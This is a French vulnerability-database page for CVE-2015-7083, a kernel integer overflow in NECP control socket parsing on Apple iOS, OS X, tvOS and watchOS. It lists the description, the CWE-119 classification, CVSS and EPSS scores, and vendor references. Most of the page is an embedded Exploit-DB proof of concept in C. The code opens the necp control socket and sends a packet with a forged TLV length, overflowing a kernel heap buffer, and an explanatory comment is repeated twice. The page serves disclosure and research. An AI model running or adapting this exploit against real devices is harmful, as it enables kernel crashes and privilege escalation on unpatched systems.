CVE-2015-7083 : Détail

CVE-2015-7083

Overflow
0.04%V3
Local
2015-12-11
10h00 +00:00
2017-09-12
07h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The kernel in Apple iOS before 9.2, OS X before 10.11.2, tvOS before 9.1, and watchOS before 2.1 allows local users to gain privileges or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-7084.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 39378

Date de publication : 2016-01-27 23h00 +00:00
Auteur : Google Security Research
EDB Vérifié : Yes

/* Source: https://code.google.com/p/google-security-research/issues/detail?id=543 NKE control sockets are documented here: https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/NKEConceptual/control/control.html By default there are actually a bunch of these providers; they are however all only accessible to root. Nevertheless, on iOS and now (thanks to SIP) OS X this is a real security boundary. necp control sockets are implemented in necp.c. The messages themselves consist of a simple header followed by type-length-value entries. The type field is a single byte and the length is a size_t (ie 8 bytes.) by sending a packed with an id of NECP_PACKET_TYPE_POLICY_ADD we can reach the following loop: // Read policy conditions for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0) { conditions_array_size += (sizeof(u_int8_t) + sizeof(size_t) + condition_size); } } The necp_packet_{find|get}_* functions cope gracefully if the final tlv is waaay bigger than the actual message (like 2^64-1 ;) ) This means that we can overflow conditions_array_size to anything we want very easily. In this PoC the packet contains three policy conditions: one of length 1; one of length 1024 and one of length 2^64-1051; later conditions_array_size is used as the size of a memory allocation: MALLOC(conditions_array, u_int8_t *, conditions_array_size, M_NECP, M_WAITOK); There is then a memory copying loop operating on the undersized array: conditions_array_cursor = 0; for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { u_int8_t condition_type = NECP_TLV_POLICY_CONDITION; size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0 && condition_size <= (conditions_array_size - conditions_array_cursor)) { <-- (a) // Add type memcpy((conditions_array + conditions_array_cursor), &condition_type, sizeof(condition_type)); conditions_array_cursor += sizeof(condition_type); // Add length memcpy((conditions_array + conditions_array_cursor), &condition_size, sizeof(condition_size)); conditions_array_cursor += sizeof(condition_size); // Add value necp_packet_get_tlv_at_offset(packet, cursor, condition_size, (conditions_array + conditions_array_cursor), NULL); <-- (b) There is actually an extra check at (a); this is why we need the first policy_condition of size one (so that the second time through the loop (conditions_array_size[1] - conditions_array_cursor[9]) will underflow allowing us to reach the necp_packet_get_tlv_at_offset call which will then copy the second 1024 byte policy. By contstructing the policy like this we can choose both the allocation size and the overflow amount, a nice primitive for an iOS kernel exploit :) this will crash in weird ways due to the rather small overflow; you can mess with the PoC to make it crash more obviously! But just run this PoC a bunch of times and you'll crash :) Tested on MacBookAir 5,2 w/ OS X 10.10.5 (14F27) */ // ianbeer /* iOS and OS X kernel code execution due to integer overflow in NECP system control socket packet parsing NKE control sockets are documented here: https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/NKEConceptual/control/control.html By default there are actually a bunch of these providers; they are however all only accessible to root. Nevertheless, on iOS and now (thanks to SIP) OS X this is a real security boundary. necp control sockets are implemented in necp.c. The messages themselves consist of a simple header followed by type-length-value entries. The type field is a single byte and the length is a size_t (ie 8 bytes.) by sending a packed with an id of NECP_PACKET_TYPE_POLICY_ADD we can reach the following loop: // Read policy conditions for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0) { conditions_array_size += (sizeof(u_int8_t) + sizeof(size_t) + condition_size); } } The necp_packet_{find|get}_* functions cope gracefully if the final tlv is waaay bigger than the actual message (like 2^64-1 ;) ) This means that we can overflow conditions_array_size to anything we want very easily. In this PoC the packet contains three policy conditions: one of length 1; one of length 1024 and one of length 2^64-1051; later conditions_array_size is used as the size of a memory allocation: MALLOC(conditions_array, u_int8_t *, conditions_array_size, M_NECP, M_WAITOK); There is then a memory copying loop operating on the undersized array: conditions_array_cursor = 0; for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { u_int8_t condition_type = NECP_TLV_POLICY_CONDITION; size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0 && condition_size <= (conditions_array_size - conditions_array_cursor)) { <-- (a) // Add type memcpy((conditions_array + conditions_array_cursor), &condition_type, sizeof(condition_type)); conditions_array_cursor += sizeof(condition_type); // Add length memcpy((conditions_array + conditions_array_cursor), &condition_size, sizeof(condition_size)); conditions_array_cursor += sizeof(condition_size); // Add value necp_packet_get_tlv_at_offset(packet, cursor, condition_size, (conditions_array + conditions_array_cursor), NULL); <-- (b) There is actually an extra check at (a); this is why we need the first policy_condition of size one (so that the second time through the loop (conditions_array_size[1] - conditions_array_cursor[9]) will underflow allowing us to reach the necp_packet_get_tlv_at_offset call which will then copy the second 1024 byte policy. By contstructing the policy like this we can choose both the allocation size and the overflow amount, a nice primitive for an iOS kernel exploit :) this will crash in weird ways due to the rather small overflow; you can mess with the PoC to make it crash more obviously! But just run this PoC a bunch of times and you'll crash :) Tested on MacBookAir 5,2 w/ OS X 10.10.5 (14F27) */ #include <errno.h> #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/kern_control.h> #include <sys/sys_domain.h> #include <net/if.h> #include <netinet/in_var.h> #include <netinet6/nd6.h> #include <arpa/inet.h> #include <sys/ioctl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #define CONTROL_NAME "com.apple.net.necp_control" int ctl_open(void) { int sock; int error = 0; struct ctl_info kernctl_info; struct sockaddr_ctl kernctl_addr; sock = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL); if (sock < 0) { printf("failed to open a SYSPROTO_CONTROL socket: %s", strerror(errno)); goto done; } memset(&kernctl_info, 0, sizeof(kernctl_info)); strlcpy(kernctl_info.ctl_name, CONTROL_NAME, sizeof(kernctl_info.ctl_name)); error = ioctl(sock, CTLIOCGINFO, &kernctl_info); if (error) { printf("Failed to get the control info for control named \"%s\": %s\n", CONTROL_NAME, strerror(errno)); goto done; } memset(&kernctl_addr, 0, sizeof(kernctl_addr)); kernctl_addr.sc_len = sizeof(kernctl_addr); kernctl_addr.sc_family = AF_SYSTEM; kernctl_addr.ss_sysaddr = AF_SYS_CONTROL; kernctl_addr.sc_id = kernctl_info.ctl_id; kernctl_addr.sc_unit = 0; error = connect(sock, (struct sockaddr *)&kernctl_addr, sizeof(kernctl_addr)); if (error) { printf("Failed to connect to the control socket: %s", strerror(errno)); goto done; } done: if (error && sock >= 0) { close(sock); sock = -1; } return sock; } struct necp_packet_header { uint8_t packet_type; uint8_t flags; uint32_t message_id; }; uint8_t* add_real_tlv(uint8_t* buf, uint8_t type, size_t len, uint8_t* val){ *buf = type; *(( size_t*)(buf+1)) = len; memcpy(buf+9, val, len); return buf+9+len; } uint8_t* add_fake_tlv(uint8_t* buf, uint8_t type, size_t len, uint8_t* val, size_t real_len){ *buf = type; *(( size_t*)(buf+1)) = len; memcpy(buf+9, val, real_len); return buf+9+real_len; } int main(){ int fd = ctl_open(); if (fd < 0) { printf("failed to get control socket :(\n"); return 1; } printf("got a control socket! %d\n", fd); size_t msg_size; uint8_t* msg = malloc(0x1000); memset(msg, 0, 0x1000); uint8_t* payload = malloc(0x1000); memset(payload, 'A', 0x1000); struct necp_packet_header* hdr = (struct necp_packet_header*) msg; hdr->packet_type = 1; // POLICY_ADD hdr->flags = 0; hdr->message_id = 0; uint8_t* buf = (uint8_t*)(hdr+1); uint32_t order = 0x41414141; buf = add_real_tlv(buf, 2, 4, &order); // NECP_TLV_POLICY_ORDER uint8_t policy = 1; // NECP_POLICY_RESULT_PASS buf = add_real_tlv(buf, 4, 1, &policy); // NECP_TLV_POLICY_RESULT buf = add_real_tlv(buf, 3, 1, payload); // NECP_TLV_POLICY_CONDITION buf = add_real_tlv(buf, 3, 1024, payload); // NECP_TLV_POLICY_CONDITION buf = add_fake_tlv(buf, 3, 0xffffffffffffffff-1050, payload, 0x10); msg_size = buf - msg; send(fd, msg, msg_size, 0); close(fd); return 0; }

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version To (including) 10.11.1

Configuraton 0

Apple>>Iphone_os >> Version To (including) 9.1

Configuraton 0

Apple>>Watchos >> Version To (including) 2.0

Configuraton 0

Apple>>Tvos >> Version To (including) 9.0

Références

https://support.apple.com/HT205635
Tags : x_refsource_CONFIRM
https://support.apple.com/HT205637
Tags : x_refsource_CONFIRM
http://www.securitytracker.com/id/1034344
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/78719
Tags : vdb-entry, x_refsource_BID
https://support.apple.com/HT205641
Tags : x_refsource_CONFIRM
https://support.apple.com/HT205640
Tags : x_refsource_CONFIRM